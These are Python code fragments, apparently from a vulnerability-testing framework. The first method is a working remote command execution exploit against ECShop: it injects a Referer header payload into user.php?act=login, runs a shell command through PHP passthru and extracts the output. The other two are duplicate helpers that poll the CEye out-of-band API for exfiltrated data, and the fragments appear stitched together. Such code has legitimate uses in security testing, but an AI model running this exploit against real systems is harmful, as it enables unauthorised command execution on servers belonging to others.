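    def _exploit(self, cmd='whoami'):
        """Send the ECShop ``user.php?act=login`` Referer payload and return command output.

        ``cmd`` is interpolated verbatim into a PHP double-quoted string
        (``passthru("...")``); a ``"``, ``$`` or backslash in it would break
        or alter the PHP payload, so callers pass a plain shell command.

        The ``version`` option selects the payload generator(s) to try:
        ``"Auto"`` tries 2.x then 3.x, ``"2.x"`` / ``"3.x"`` try only that one.
        Any other value sends nothing and returns ``None`` (the original left
        ``payloads`` unbound and raised ``UnboundLocalError`` in that case).

        :param cmd: shell command to execute on the target.
        :return: the text ``get_middle_text`` extracts from the hidden
            ``back_act`` field of the response, or ``None`` when no payload
            produced extractable output.
        """
        url = urljoin(self.url, '/user.php?act=login')
        phpcode = 'passthru("{0}");'.format(cmd)

        # One payload per ECShop major version; the generators live on the class.
        by_version = {
            '2.x': self.gen_ec2payload(phpcode),
            '3.x': self.gen_ec3payload(phpcode),
        }
        option = self.get_option("version")
        if option == "Auto":
            versions = ['2.x', '3.x']
        elif option in by_version:
            versions = [option]
        else:
            versions = []

        # Two end markers are tried in order against the same response.
        start_marker = '''<input type="hidden" name="back_act" value="'''
        end_markers = ("\n<br />", 'xxx')
        for version in versions:
            headers = {'Referer': by_version[version]}
            # A bounded timeout keeps a stalled target from hanging the PoC.
            resp = requests.get(url, headers=headers, timeout=10)
            for end_marker in end_markers:
                r = get_middle_text(resp.text, start_marker, end_marker)
                if r:
                    return r
        return None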
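    def exact_request(self, flag, type="request"):
        """Poll the CEye records API for ``flag`` and return the data it carried.

        Makes up to three attempts, sleeping one second before each. A 200
        response that contains ``flag`` but yields no extractable record
        stops the loop; network or parsing errors count as a failed attempt
        and are retried.

        :param flag: marker string to filter the CEye records by.
        :param type: record type, ``"dns"`` or ``"request"`` (default).
        :return: the text ``get_middle_text`` finds between two occurrences
            of ``flag`` in a record ``name``, or ``False`` when nothing
            matched within the retry budget.
        """
        # NOTE(review): the API token travels in the query string over
        # plain http://, so it is exposed on the wire and in intermediary
        # logs; prefer https if the CEye endpoint serves it.
        url = (
            "http://api.ceye.io/v1/records?token={token}&type={type}&filter={flag}"
        ).format(token=self.token, type=type, flag=flag)
        attempts = 3
        while attempts:
            try:
                time.sleep(1)
                # Bounded timeout: a stalled API call must not defeat the retry loop.
                resp = requests.get(url, timeout=10)
                if resp and resp.status_code == 200 and flag in resp.text:
                    data = json.loads(resp.text)
                    for item in data["data"]:
                        name = item.get("name", '')
                        # Both delimiters are the flag itself: extract what
                        # sits between two copies of it.
                        found = get_middle_text(name, flag, flag, 0)
                        if found:
                            return found
                    # Got a well-formed answer with no match: stop retrying.
                    break
            except Exception as ex:
                # Best-effort: log and spend one attempt, then try again.
                logger.warn(ex)
                time.sleep(1)
            attempts -= 1
        return False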
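    def exact_request(self, flag, type="request"):
        """Poll the CEye records API for ``flag`` and return the data it carried.

        Returns ``""`` immediately when ``check_account()`` fails. Otherwise
        makes up to three attempts, sleeping one second before each. A 200
        response that contains ``flag`` but yields no extractable record
        stops the loop; network or parsing errors count as a failed attempt
        and are retried.

        :param flag: marker string to filter the CEye records by.
        :param type: record type, ``"dns"`` or ``"request"`` (default).
        :return: the text ``get_middle_text`` finds in a record ``name``
            between ``"/" + flag`` and ``flag``, ``""`` when the account
            check fails, or ``False`` when nothing matched within the
            retry budget.
        """
        if not self.check_account():
            return ""
        # NOTE(review): the API token travels in the query string over
        # plain http://, so it is exposed on the wire and in intermediary
        # logs; prefer https if the CEye endpoint serves it.
        url = "http://api.ceye.io/v1/records?token={token}&type={type}&filter={flag}".format(
            token=self.token, type=type, flag=flag)
        attempts = 3
        while attempts:
            try:
                time.sleep(1)
                # Bounded timeout: a stalled API call must not defeat the retry loop.
                resp = requests.get(url, timeout=10)
                if resp and resp.status_code == 200 and flag in resp.text:
                    data = json.loads(resp.text)
                    for item in data["data"]:
                        name = item.get("name", '')
                        # Start delimiter is the flag preceded by a slash; the
                        # fourth argument offsets the search by 7 + len(flag).
                        found = get_middle_text(name, "/" + flag, flag, 7 + len(flag))
                        if found:
                            return found
                    # Got a well-formed answer with no match: stop retrying.
                    break
            except Exception as ex:
                # Best-effort: log and spend one attempt, then try again.
                logger.warn(ex)
                time.sleep(1)
            attempts -= 1
        return False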